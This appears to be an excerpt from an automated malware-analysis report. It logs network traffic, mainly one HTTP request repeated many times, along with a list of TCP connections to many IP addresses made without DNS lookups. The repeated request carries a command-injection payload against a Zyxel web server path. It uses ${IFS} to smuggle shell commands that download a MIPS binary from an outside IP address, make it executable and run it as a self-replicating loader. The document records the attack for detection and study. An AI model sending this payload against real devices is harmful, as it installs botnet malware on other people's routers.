            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 132.21.97.88
            Source: unknownTCP traffic detected without corresponding DNS query: 41.7.107.223
            Source: unknownTCP traffic detected without corresponding DNS query: 41.211.51.89
            Source: unknownTCP traffic detected without corresponding DNS query: 41.75.67.98
            Source: unknownTCP traffic detected without corresponding DNS query: 157.18.64.248
            Source: unknownTCP traffic detected without corresponding DNS query: 41.133.239.74
            Source: unknownTCP traffic detected without corresponding DNS query: 197.97.80.47
            Source: unknownTCP traffic detected without corresponding DNS query: 41.211.140.174
            Source: unknownTCP traffic detected without corresponding DNS query: 41.202.221.231
            Source: unknownTCP traffic detected without corresponding DNS query: 197.228.230.140
            Source: unknownTCP traffic detected without corresponding DNS query: 41.247.116.156
            Source: unknownTCP traffic detected without corresponding DNS query: 71.55.208.35
            Source: unknownTCP traffic detected without corresponding DNS query: 197.16.177.47
            Source: unknownTCP traffic detected without corresponding DNS query: 133.113.141.134
            Source: unknownTCP traffic detected without corresponding DNS query: 159.64.103.105
            Source: unknownTCP traffic detected without corresponding DNS query: 157.165.122.147
            Source: unknownTCP traffic detected without corresponding DNS query: 197.84.147.224
            Source: unknownTCP traffic detected without corresponding DNS query: 41.148.94.92
            Source: unknownTCP traffic detected without corresponding DNS query: 190.220.159.148
            Source: unknownTCP traffic detected without corresponding DNS query: 157.200.207.214
            Source: unknownTCP traffic detected without corresponding DNS query: 41.192.74.147
            Source: unknownTCP traffic detected without corresponding DNS query: 20.235.207.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.93.212.136
            Source: unknownTCP traffic detected without corresponding DNS query: 41.231.149.255
            Source: unknownTCP traffic detected without corresponding DNS query: 41.238.30.148
            Source: unknownTCP traffic detected without corresponding DNS query: 197.212.204.175
            Source: unknownTCP traffic detected without corresponding DNS query: 41.74.39.1
            Source: unknownTCP traffic detected without corresponding DNS query: 166.246.70.125
            Source: unknownTCP traffic detected without corresponding DNS query: 197.77.203.201
            Source: unknownTCP traffic detected without corresponding DNS query: 41.69.241.58
            Source: unknownTCP traffic detected without corresponding DNS query: 157.133.231.129
            Source: unknownTCP traffic detected without corresponding DNS query: 45.75.148.108
            Source: unknownTCP traffic detected without corresponding DNS query: 157.14.50.130
            Source: unknownTCP traffic detected without corresponding DNS query: 41.103.5.216
            Source: unknownTCP traffic detected without corresponding DNS query: 197.185.74.177
            Source: unknownTCP traffic detected without corresponding DNS query: 197.187.200.229
            Source: unknownTCP traffic detected without corresponding DNS query: 157.251.182.198
            Source: unknownTCP traffic detected without corresponding DNS query: 199.45.131.82
            Source: unknownTCP traffic detected without corresponding DNS query: 197.34.161.157
            Source: unknownTCP traffic detected without corresponding DNS query: 77.4.59.31
            Source: unknownTCP traffic detected without corresponding DNS query: 157.108.161.34
            Source: unknownTCP traffic detected without corresponding DNS query: 41.229.241.24
            Source: unknownTCP traffic detected without corresponding DNS query: 197.92.179.180
            Source: unknownTCP traffic detected without corresponding DNS query: 41.50.90.84
            Source: unknownTCP traffic detected without corresponding DNS query: 157.243.134.220
            Source: unknownTCP traffic detected without corresponding DNS query: 41.40.117.54
            Source: unknownTCP traffic detected without corresponding DNS query: 197.105.28.37
            Source: unknownTCP traffic detected without corresponding DNS query: 157.28.19.242
            Source: unknownTCP traffic detected without corresponding DNS query: 197.187.202.85
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
